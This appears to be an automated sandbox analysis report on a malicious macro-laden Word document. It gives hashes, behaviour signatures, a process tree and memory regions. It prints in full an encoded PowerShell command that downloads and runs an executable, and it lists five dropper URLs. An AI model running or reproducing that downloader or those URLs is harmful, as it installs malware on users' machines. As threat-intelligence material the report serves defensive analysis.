Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    27/04/2024, 05:26

General

  • Target

    02868750016b0cde2fa07620568b246e_JaffaCakes118.doc

  • Size

    202KB

  • MD5

    02868750016b0cde2fa07620568b246e

  • SHA1

    242cf0ae87913e8591b9bada7165dc75c0cdc4ea

  • SHA256

    f630ad012c459958ec8f986f9ebf7bb9468bb0734d012e078ef5f240c639a597

  • SHA512

    43ec55d6a24de8bcfdcc9267c45654f85f5fb8db399491f5336333a9960fd202e21965104f894ed39fbb32be00f6d1c4ca759ee32dfc7da8abe4e6818618031a

  • SSDEEP

    3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUg1r6EOpwg53RF:Z2k4NtGiL3HJk9yD7bgr6Eqwg53RF

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://femminent.com/wp/UqU/

exe.dropper

http://liberty.blvrdev.com/stats/bLH/

exe.dropper

http://milkteaway.azurewebsites.net/calendar/bNmo99828/

exe.dropper

http://nehashetty.xyz/wp-admin/vNWZ/

exe.dropper

http://storeofofficial.shop/pokjbg746ihrtr/3u/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\02868750016b0cde2fa07620568b246e_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABEAHYAYwB3AG8AYQBmAGgAYQB4AGUAPQAnAEIAZwBhAG4AawBjAHkAbwBkAHkAegBpAHAAJwA7ACQAUQBvAG0AegBhAHoAbwB1AGEAIAA9ACAAJwAzADMANwAnADsAJABFAGoAbQBhAGIAbABoAHAAaQB2AGcAPQAnAFIAawBtAGMAcQB5AHQAegBiAGoAeAAnADsAJABYAHAAcABkAHIAZQBrAGgAbAB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAG8AbQB6AGEAegBvAHUAYQArACcALgBlAHgAZQAnADsAJABBAHcAYwBuAHkAcwBxAHIAdgBvAHMAbAB1AD0AJwBMAGYAbwB2AHMAeABsAG8AbgBnAHoAagB2ACcAOwAkAEsAaABiAHkAYwBzAHQAcQBqAHUAdwA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAEwAaQBlAE4AdAA7ACQAUgBqAGwAcQBrAHIAcgB2AD0AJwBoAHQAdABwADoALwAvAGYAZQBtAG0AaQBuAGUAbgB0AC4AYwBvAG0ALwB3AHAALwBVAHEAVQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAYgBlAHIAdAB5AC4AYgBsAHYAcgBkAGUAdgAuAGMAbwBtAC8AcwB0AGEAdABzAC8AYgBMAEgALwAqAGgAdAB0AHAAOgAvAC8AbQBpAGwAawB0AGUAYQB3AGEAeQAuAGEAegB1AHIAZQB3AGUAYgBzAGkAdABlAHMALgBuAGUAdAAvAGMAYQBsAGUAbgBkAGEAcgAvAGIATgBtAG8AOQA5ADgAMgA4AC8AKgBoAHQAdABwADoALwAvAG4AZQBoAGEAcwBoAGUAdAB0AHkALgB4AHkAegAvAHcAcAAtAGEAZABtAGkAbgAvAHYATgBXAFoALwAqAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBlAG8AZgBvAGYAZgBpAGMAaQBhAGwALgBzAGgAbwBwAC8AcABvAGsAagBiAGcANwA0ADYAaQBoAHIAdAByAC8AMwB1AC8AJwAuACIAcwBgAFAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABaAG8AYwBjAGwAbABtAHUAPQAnAFEAeQB3AHcAdQByAHcAagB1AG8AdgAnADsAZgBvAHIAZQBhAGMAaAAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAgAGkAbgAgACQAUgBqAGwAcQBrAHIAcgB2ACkAewB0AHIAeQB7ACQASwBoAGIAeQBjAHMAdABxAGoAdQB3AC4AIgBkAE8AdwBgAE4AbABPAGEAYABEAEYAaQBMAGUAIgAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAsACAAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEYAYgBvAGkAbwBoAHoAaQA9ACcAUgBvAGQAagBzAGQAbgB5ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWABwAHAAZAByAGUAawBoAGwAeQApAC4AIgBMAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADIAOAAxADIAMAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIAZQBhAFQARQAiACgAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEMAegBwAHIAdABvAGQAYQBhAD0AJwBGAG0AdwBhAHgAYwB5AG4AeAAnADsAYgByAGUAYQBrADsAJABXAGUAaABxAGkAZABmAGgAcABsAGQAdgA9ACcAWQBxAHYAcwB3AGgAdABhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAbQByAGcAawBhAHcAdABhAGcAPQAnAEoAYwBnAHoAdQB0AGwAdwBjAHIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3012

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            2a68335a4af6def497c08d7894790abc

            SHA1

            a00795bb94df28a7ff118cae3b628005ca64a2f8

            SHA256

            e39628f8bb7493798b6ba273413e12b0de7e59085b5e5a95f1524af0683474cb

            SHA512

            736b70fc72c22a4c00dc5ae2e0aadfd22253eed5e7385f6f2b8ce955f95a566f0f88b103bfad39ba6a433b5e30a0a504ab0f2998412013ad56e95e90a5f13b96

          • memory/2252-38-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-2-0x000000007158D000-0x0000000071598000-memory.dmp

            Filesize

            44KB

          • memory/2252-7-0x0000000000460000-0x0000000000560000-memory.dmp

            Filesize

            1024KB

          • memory/2252-9-0x0000000006790000-0x0000000006890000-memory.dmp

            Filesize

            1024KB

          • memory/2252-8-0x0000000000460000-0x0000000000560000-memory.dmp

            Filesize

            1024KB

          • memory/2252-10-0x0000000000460000-0x0000000000560000-memory.dmp

            Filesize

            1024KB

          • memory/2252-23-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-28-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-0-0x000000002F1D1000-0x000000002F1D2000-memory.dmp

            Filesize

            4KB

          • memory/2252-33-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-67-0x000000007158D000-0x0000000071598000-memory.dmp

            Filesize

            44KB

          • memory/2252-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2252-39-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-47-0x000000007158D000-0x0000000071598000-memory.dmp

            Filesize

            44KB

          • memory/2252-48-0x0000000000460000-0x0000000000560000-memory.dmp

            Filesize

            1024KB

          • memory/2252-49-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-50-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2252-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/3012-46-0x0000000001F40000-0x0000000001F48000-memory.dmp

            Filesize

            32KB

          • memory/3012-45-0x000000001B860000-0x000000001BB42000-memory.dmp

            Filesize

            2.9MB